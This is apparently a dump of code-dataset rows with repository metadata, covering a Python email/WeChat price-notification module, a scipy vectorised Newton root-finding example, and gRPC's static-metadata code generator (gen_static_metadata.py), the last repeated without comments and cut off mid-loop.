plain_text = MIMEText(body, _subtype='plain', _charset='UTF-8')
msg.attach(plain_text)
try:
smtp_client.sendmail(zvt_config['email_username'], to_user, msg.as_string())
except Exception as e:
self.logger.exception('send email failed', e)
def send_message(self, to_user, title, body, sub_size=20, with_sender=True, **kwargs):
if type(to_user) is list and sub_size:
size = len(to_user)
if size >= sub_size:
step_size = int(size / sub_size)
if size % sub_size:
step_size = step_size + 1
else:
step_size = 1
for step in range(step_size):
sub_to_user = to_user[sub_size * step:sub_size * (step + 1)]
if with_sender:
sub_to_user.append(zvt_config['email_username'])
self.send_message_(sub_to_user, title, body, **kwargs)
else:
self.send_message_(to_user, title, body, **kwargs)
class WechatInformer(Informer):
GET_TOKEN_URL = "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid={}&secret={}".format(
zvt_config['wechat_app_id'], zvt_config['wechat_app_secrect'])
GET_TEMPLATE_URL = "https://api.weixin.qq.com/cgi-bin/template/get_all_private_template?access_token={}"
SEND_MSG_URL = "https://api.weixin.qq.com/cgi-bin/message/template/send?access_token={}"
token = None
def __init__(self, http_session) -> None:
self.refresh_token(http_session)
def refresh_token(self, http_session):
resp = sync_get(http_session, self.GET_TOKEN_URL)
self.logger.info("refresh_token resp.status_code:{}, resp.text:{}".format(resp.status_code, resp.text))
if resp.status_code == 200 and resp.json() and 'access_token' in resp.json():
self.token = resp.json()['access_token']
else:
self.logger.exception("could not refresh_token")
def send_price_notification(self, http_session, to_user, security_name, current_price, change_pct):
the_json = self._format_price_notification(to_user, security_name, current_price, change_pct)
the_data = json.dumps(the_json, ensure_ascii=False).encode('utf-8')
json_result = sync_post(http_session, self.SEND_MSG_URL.format(self.token), json=the_data)
if json_result is not None:
self.logger.info("send_price_notification to user:{} data:{} success".format(to_user, the_json))
def _format_price_notification(self, to_user, security_name, current_price, change_pct):
if change_pct > 0:
title = '吃肉喝汤'
else:
title = '关灯吃面'
template_id = 'mkqi-L1h56mH637vLXiuS_ulLTs1byDYYgLBbSXQ65U'
the_json = {
"touser": to_user,
"template_id": template_id,
"url": "http://www.foolcage.com",
"data": {
"first": {
"value": title,
"color": "#173177"
},
"keyword1": {
"value": security_name,
"color": "#173177"
},
"keyword2": {
"value": current_price,
"color": "#173177"
},
"keyword3": {
"value": '{:.2%}'.format(change_pct),
"color": "#173177"
},
"remark": {
"value": "会所嫩模 Or 下海干活?",
"color": "#173177"
}
}
}
return the_json
if __name__ == '__main__':
email_action = EmailInformer()
email_action.send_message(["5533061@qq.com", '2315983623@qq.com'], 'helo', 'just a test', sub_size=20)
http_session = get_http_session()
weixin_action = WechatInformer(http_session)
weixin_action.send_price_notification(http_session,
to_user='oRvNP0XIb9G3g6a-2fAX9RHX5--Q',
security_name='BTC/USDT',
current_price=1000,
change_pct='0.5%')
__all__ = ['Informer', 'EmailInformer', 'WechatInformer']
| true
| true
|
f705a95dd49f7443385a19b9bb52262d3489eae7
| 277
|
py
|
Python
|
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
global_motion_estimation/test scripts/gradient descent tests/dummy.py
|
Samaretas/global-motion-estimation
|
798b70ccc23ac6d6c9d25119db22d346c965faca
|
[
"MIT"
] | null | null | null |
import numpy as np
from scipy import optimize


def f(x, a):
    """Residual ``x**3 - a``; its root is the cube root of ``a``."""
    return x ** 3 - a


def fder(x, a):
    """Derivative of ``f`` with respect to ``x`` (``a`` is unused)."""
    return 3 * x ** 2


# One random starting guess for each of the 100 target values in [-50, 50).
rng = np.random.default_rng()
starts = rng.standard_normal(100)
targets = np.arange(-50, 50)

# Vectorized Newton's method: all 100 root-finds run simultaneously.
roots = optimize.newton(f, starts, fprime=fder, args=(targets, ), maxiter=200)
print(roots)
| 21.307692
| 69
| 0.6787
|
import numpy as np
from scipy import optimize
def f(x, a): return x**3 - a
def fder(x, a): return 3 * x**2
rng = np.random.default_rng()
x = rng.standard_normal(100)
a = np.arange(-50, 50)
vec_res = optimize.newton(f, x, fprime=fder, args=(a, ), maxiter=200)
print(vec_res)
| true
| true
|
f705a9bd41c3c5d52a4114e43e885fd40f95eb2b
| 18,618
|
py
|
Python
|
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | 1
|
2020-02-22T04:55:43.000Z
|
2020-02-22T04:55:43.000Z
|
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | null | null | null |
tools/codegen/core/gen_static_metadata.py
|
benjaminp/grpc
|
dfb1a0f20624417bff408a14b12a23713085b999
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
# Configuration: a list of either strings or 2-tuples of strings.
# A single string represents a static grpc_mdstr.
# A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will
# also be created).
# The list of 2-tuples must begin with the static hpack table elements as
# defined by RFC 7541 and be in the same order because of an hpack encoding
# performance optimization that relies on this. If you want to change this, then
# you must change the implementation of the encoding optimization as well.
CONFIG = [
# metadata strings
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
# channel arg keys
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
# well known method names
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
# compression algorithm names
'deflate',
'gzip',
'stream/gzip',
# metadata elements
# begin hpack static elements
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
# end hpack static elements
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-token', ''),
('lb-cost-bin', ''),
]
# All entries here are ignored when counting non-default initial metadata that
# prevents the chttp2 server from sending a Trailers-Only response.
METADATA_BATCH_CALLOUTS = [
# (name)
(':path'),
(':method'),
(':status'),
(':authority'),
(':scheme'),
('te'),
('grpc-message'),
('grpc-status'),
('grpc-payload-bin'),
('grpc-encoding'),
('grpc-accept-encoding'),
('grpc-server-stats-bin'),
('grpc-tags-bin'),
('grpc-trace-bin'),
('content-type'),
('content-encoding'),
('accept-encoding'),
('grpc-internal-encoding-request'),
('grpc-internal-stream-encoding-request'),
('user-agent'),
('host'),
('lb-token'),
('grpc-previous-rpc-attempts'),
('grpc-retry-pushback-ms'),
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
# utility: mangle the name of a config
def mangle(elem, name=None):
    """Mangle a config entry into a C identifier.

    ``elem`` is either a bare string (-> ``grpc_mdstr_*``) or a
    ``(key, value)`` tuple (-> ``grpc_mdelem_*``); ``name`` overrides the
    middle component of the prefix ('' suppresses the prefix entirely).
    """
    # Character substitutions applied before lowercasing.
    translations = {
        '-': '_',
        ':': '',
        '/': 'slash',
        '.': 'dot',
        ',': 'comma',
        ' ': '_',
    }

    def ident(text):
        # Convert one string into an identifier fragment.
        if not text:
            return 'empty'
        out = ''
        for ch in text:
            piece = translations.get(ch, ch.lower())
            if not piece:
                continue
            at_word_break = (out[-1] == '_') if out else True
            if piece == '_' and at_word_break:
                # Collapse runs of underscores (and drop leading ones).
                continue
            if len(piece) > 1:
                # Multi-character replacements are set off with underscores.
                if not at_word_break:
                    out += '_'
                out += piece + '_'
            else:
                out += piece
        if out[-1] == '_':
            out = out[:-1]
        return out

    def prefix(default):
        if name is None:
            return 'grpc_%s_' % default
        if name == '':
            return ''
        return 'grpc_%s_' % name

    if isinstance(elem, tuple):
        return '%s%s_%s' % (prefix('mdelem'), ident(elem[0]), ident(elem[1]))
    return '%s%s' % (prefix('mdstr'), ident(elem))
# utility: generate some hash value for a string
def fake_hash(elem):
    """Return the first 8 hex digits of the MD5 of ``elem`` — a stable short hash."""
    digest = hashlib.md5(elem).hexdigest()
    return digest[:8]
# utility: print a big comment block into a set of files
# NOTE: Python 2 print-statement syntax ("print >> f") — this script runs
# under python2.7 (see the shebang at the top of the file).
def put_banner(files, banner):
    """Write ``banner`` lines as one C block comment into each file in ``files``."""
    for f in files:
        print >> f, '/*'
        for line in banner:
            print >> f, ' * %s' % line
        print >> f, ' */'
        # Trailing blank line after the comment block.
        print >> f
# build a list of all the strings we need
all_strs = list()
all_elems = list()
# Maps mdelem -> integer user-data payload later emitted into
# grpc_static_mdelem_user_data (entries absent here get 0).
static_userdata = {}
# put metadata batch callouts first, to make the check of if a static metadata
# string is a callout trivial
for elem in METADATA_BATCH_CALLOUTS:
    if elem not in all_strs:
        all_strs.append(elem)
# Collect every unique string and (key, value) element from CONFIG,
# preserving first-seen order (ordering matters for the hpack static table).
for elem in CONFIG:
    if isinstance(elem, tuple):
        if elem[0] not in all_strs:
            all_strs.append(elem[0])
        if elem[1] not in all_strs:
            all_strs.append(elem[1])
        if elem not in all_elems:
            all_elems.append(elem)
    else:
        if elem not in all_strs:
            all_strs.append(elem)
# One 'grpc-accept-encoding' element per non-empty bitmask of algorithms;
# the value is the comma-joined list of algorithms present in the mask.
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
    val = ','.join(COMPRESSION_ALGORITHMS[alg]
                   for alg in range(0, len(COMPRESSION_ALGORITHMS))
                   if (1 << alg) & mask)
    elem = ('grpc-accept-encoding', val)
    if val not in all_strs:
        all_strs.append(val)
    if elem not in all_elems:
        all_elems.append(elem)
    compression_elems.append(elem)
    # User data encodes the mask (|1 presumably forces the identity bit;
    # +1 keeps the stored value non-zero) — TODO confirm decoder side.
    static_userdata[elem] = 1 + (mask | 1)
# Same construction for stream compression ('accept-encoding').
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
    val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
                   for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
                   if (1 << alg) & mask)
    elem = ('accept-encoding', val)
    if val not in all_strs:
        all_strs.append(val)
    if elem not in all_elems:
        all_elems.append(elem)
    stream_compression_elems.append(elem)
    static_userdata[elem] = 1 + (mask | 1)
# output configuration
# With CLI args, the selected artifact ('header' / 'source' / 'dictionary')
# goes to stdout and the others to /dev/null; with no args, all three are
# written into the source tree relative to this script's location.
args = sys.argv[1:]
H = None
C = None
D = None
if args:
    if 'header' in args:
        H = sys.stdout
    else:
        H = open('/dev/null', 'w')
    if 'source' in args:
        C = sys.stdout
    else:
        C = open('/dev/null', 'w')
    if 'dictionary' in args:
        D = sys.stdout
    else:
        D = open('/dev/null', 'w')
else:
    H = open(
        os.path.join(
            os.path.dirname(sys.argv[0]),
            '../../../src/core/lib/transport/static_metadata.h'), 'w')
    C = open(
        os.path.join(
            os.path.dirname(sys.argv[0]),
            '../../../src/core/lib/transport/static_metadata.cc'), 'w')
    D = open(
        os.path.join(
            os.path.dirname(sys.argv[0]),
            '../../../test/core/end2end/fuzzers/hpack.dictionary'), 'w')
# copy-paste copyright notice from this file
with open(sys.argv[0]) as my_source:
    copyright = []
    # Skip the leading shebang/comment run up to the first non-'#' line.
    for line in my_source:
        if line[0] != '#':
            break
    # Then capture the next contiguous run of '#' lines (the license block).
    for line in my_source:
        if line[0] == '#':
            copyright.append(line)
            break
    for line in my_source:
        if line[0] != '#':
            break
        copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
    """Render a byte sequence as a double-quoted C-style string literal.

    Printable ASCII is emitted verbatim (with '"' backslash-escaped);
    every other byte becomes a two-digit \\xHH escape.
    """
    pieces = ['"']
    for byte in line:
        if 32 <= byte < 127:
            pieces.append('\\"' if byte == ord('"') else chr(byte))
        else:
            pieces.append('\\x%02X' % byte)
    pieces.append('"')
    return ''.join(pieces)
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H
print >> H, '#include <grpc/support/port_platform.h>'
print >> H
print >> H, '#include "src/core/lib/transport/metadata.h"'
print >> H
print >> C, '#include <grpc/support/port_platform.h>'
print >> C
print >> C, '#include "src/core/lib/transport/static_metadata.h"'
print >> C
print >> C, '#include "src/core/lib/slice/slice_internal.h"'
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def(i):
    """C initializer for static slice ``i``: refcount pointer plus the
    slice's offset/length into the g_bytes blob (via module-level
    ``id2strofs`` and ``all_strs``)."""
    template = '{&grpc_static_metadata_refcounts[%d], {{g_bytes+%d, %d}}}'
    return template % (i, id2strofs[i], len(all_strs[i]))
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs)
print >> H, ('extern const grpc_slice '
'grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT];')
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '#define %s (grpc_static_slice_table[%d])' % (
mangle(elem).upper(), i)
print >> H
print >> C, 'static uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> C, 'static void static_ref(void *unused) {}'
print >> C, 'static void static_unref(void *unused) {}'
print >> C, ('static const grpc_slice_refcount_vtable static_sub_vtable = '
'{static_ref, static_unref, grpc_slice_default_eq_impl, '
'grpc_slice_default_hash_impl};')
print >> H, ('extern const grpc_slice_refcount_vtable '
'grpc_static_metadata_vtable;')
print >> C, ('const grpc_slice_refcount_vtable grpc_static_metadata_vtable = '
'{static_ref, static_unref, grpc_static_slice_eq, '
'grpc_static_slice_hash};')
print >> C, ('static grpc_slice_refcount static_sub_refcnt = '
'{&static_sub_vtable, &static_sub_refcnt};')
print >> H, ('extern grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT];')
print >> C, ('grpc_slice_refcount '
'grpc_static_metadata_refcounts[GRPC_STATIC_MDSTR_COUNT] = {')
for i, elem in enumerate(all_strs):
print >> C, ' {&grpc_static_metadata_vtable, &static_sub_refcnt},'
print >> C, '};'
print >> C
print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\'
print >> H, (' ((slice).refcount != NULL && (slice).refcount->vtable == '
'&grpc_static_metadata_vtable)')
print >> H
print >> C, ('const grpc_slice grpc_static_slice_table[GRPC_STATIC_MDSTR_COUNT]'
' = {')
for i, elem in enumerate(all_strs):
print >> C, slice_def(i) + ','
print >> C, '};'
print >> C
print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\'
print >> H, (' ((int)((static_slice).refcount - '
'grpc_static_metadata_refcounts))')
print >> H
print >> D, '# hpack fuzzing dictionary'
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems)
print >> H, ('extern grpc_mdelem_data '
'grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT];')
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('#define %s (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[%d], '
'GRPC_MDELEM_STORAGE_STATIC))') % (mangle(elem).upper(), i)
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def str_idx(s):
    """Index of string ``s`` in the module-level ``all_strs`` table
    (None when absent, matching the original's implicit fall-through)."""
    try:
        return all_strs.index(s)
    except ValueError:
        return None
def md_idx(m):
    """Index of metadata pair ``m`` in the module-level ``all_elems`` table
    (None when absent, matching the original's implicit fall-through)."""
    try:
        return all_elems.index(m)
    except ValueError:
        return None
def offset_trials(mink):
    """Yield candidate offsets: 0, then -1, 1, -2, 2, ... up to +/-99.

    ``mink`` is accepted for interface compatibility but unused.
    """
    yield 0
    for magnitude in range(1, 100):
        yield -magnitude
        yield magnitude
def perfect_hash(keys, name):
    """Build perfect-hash parameters for ``keys`` via the third-party
    ``perfection`` package.

    Returns a dict with the hash output range ('PHASHRANGE'), the key count
    ('PHASHNKEYS'), a Python evaluator ('pyfunc') mirroring the emitted C
    function, and the C source text itself ('code').
    """
    p = perfection.hash_parameters(keys)

    def f(i, p=p):
        # Python mirror of the generated %(name)s_phash C function.
        i += p.offset
        x = i % p.t
        # NOTE: Python 2 integer division (this script targets python2.7);
        # under Python 3 this would produce a float index and fail.
        y = i / p.t
        return x + p.r[y]

    return {
        'PHASHRANGE': p.t - 1 + max(p.r),
        'PHASHNKEYS': len(p.slots),
        'pyfunc': f,
        # The emitted C helper; '%%' survives the %-substitution as the C
        # modulus operator.
        'code': """
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
  i %(offset_sign)s= %(offset)d;
  uint32_t x = i %% %(t)d;
  uint32_t y = i / %(t)d;
  uint32_t h = x;
  if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
    uint32_t delta = (uint32_t)%(name)s_r[y];
    h += delta;
  }
  return h;
}
    """ % {
            'name': name,
            # Holes in the displacement table become 0.
            'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
            't': p.t,
            'offset': abs(p.offset),
            'offset_sign': '+' if p.offset > 0 else '-'
        }
    }
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHRANGE'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(int a, int b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = (uint32_t)(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[elem_idxs[h]], GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> C, 'grpc_mdelem_data grpc_static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for a, b in all_elems:
print >> C, '{%s,%s},' % (slice_def(str_idx(a)), slice_def(str_idx(b)))
print >> C, '};'
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
print >> H, '#define GRPC_BATCH_INDEX_OF(slice) \\'
print >> H, ' (GRPC_IS_STATIC_METADATA_STRING((slice)) ? (grpc_metadata_batch_callouts_index)GPR_CLAMP(GRPC_STATIC_METADATA_INDEX((slice)), 0, GRPC_BATCH_CALLOUTS_COUNT) : GRPC_BATCH_CALLOUTS_COUNT)'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table[grpc_static_accept_stream_encoding_metadata[(algs)]], GRPC_MDELEM_STORAGE_STATIC))'
print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */'
H.close()
C.close()
| 30.773554
| 204
| 0.591363
|
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
CONFIG = [
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
'deflate',
'gzip',
'stream/gzip',
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-token', ''),
('lb-cost-bin', ''),
]
METADATA_BATCH_CALLOUTS = [
(':path'),
(':method'),
(':status'),
(':authority'),
(':scheme'),
('te'),
('grpc-message'),
('grpc-status'),
('grpc-payload-bin'),
('grpc-encoding'),
('grpc-accept-encoding'),
('grpc-server-stats-bin'),
('grpc-tags-bin'),
('grpc-trace-bin'),
('content-type'),
('content-encoding'),
('accept-encoding'),
('grpc-internal-encoding-request'),
('grpc-internal-stream-encoding-request'),
('user-agent'),
('host'),
('lb-token'),
('grpc-previous-rpc-attempts'),
('grpc-retry-pushback-ms'),
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
def mangle(elem, name=None):
    """Turn a metadata string or (key, value) pair into a C identifier.

    `elem` is either a plain string (yielding a grpc_mdstr_* name) or a
    two-tuple (yielding a grpc_mdelem_* name).  `name` overrides the default
    prefix: None keeps the default, '' drops the prefix entirely, anything
    else becomes 'grpc_<name>_'.
    """
    # Character substitutions applied before lowercasing everything else.
    translations = {
        '-': '_',
        ':': '',
        '/': 'slash',
        '.': 'dot',
        ',': 'comma',
        ' ': '_',
    }

    def sanitize(text):
        # Empty input gets a placeholder identifier.
        if not text:
            return 'empty'
        out = ''
        for ch in text:
            piece = translations.get(ch, ch.lower())
            if not piece:
                continue  # character maps to nothing (e.g. ':')
            ends_in_sep = out[-1] == '_' if out else True
            if ends_in_sep and piece == '_':
                continue  # collapse separator runs; strip leading separators
            if len(piece) > 1:
                # Multi-character replacements are set off with underscores.
                if not ends_in_sep:
                    out += '_'
                out = out + piece + '_'
            else:
                out += piece
        if out[-1] == '_':
            out = out[:-1]
        return out

    def prefix():
        if name is None:
            return 'grpc_%s_' % ('mdelem' if isinstance(elem, tuple) else 'mdstr')
        if name == '':
            return ''
        return 'grpc_%s_' % name

    if isinstance(elem, tuple):
        return '%s%s_%s' % (prefix(), sanitize(elem[0]), sanitize(elem[1]))
    return '%s%s' % (prefix(), sanitize(elem))
def fake_hash(elem):
    # Short, stable fingerprint: first 8 hex digits of the MD5 of `elem`.
    # NOTE(review): Python 2 style — md5() is fed `elem` directly; under
    # Python 3 this would require bytes, not str.
    return hashlib.md5(elem).hexdigest()[0:8]
def put_banner(files, banner):
    """Write `banner` lines as a C block comment to each file in `files`.

    Uses Python 2 `print >> file` redirection; a trailing blank line follows
    the closing comment delimiter.
    """
    for f in files:
        print >> f, '/*'
        for line in banner:
            print >> f, ' * %s' % line
        print >> f, ' */'
        print >> f
all_strs = list()
all_elems = list()
static_userdata = {}
for elem in METADATA_BATCH_CALLOUTS:
if elem not in all_strs:
all_strs.append(elem)
for elem in CONFIG:
if isinstance(elem, tuple):
if elem[0] not in all_strs:
all_strs.append(elem[0])
if elem[1] not in all_strs:
all_strs.append(elem[1])
if elem not in all_elems:
all_elems.append(elem)
else:
if elem not in all_strs:
all_strs.append(elem)
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
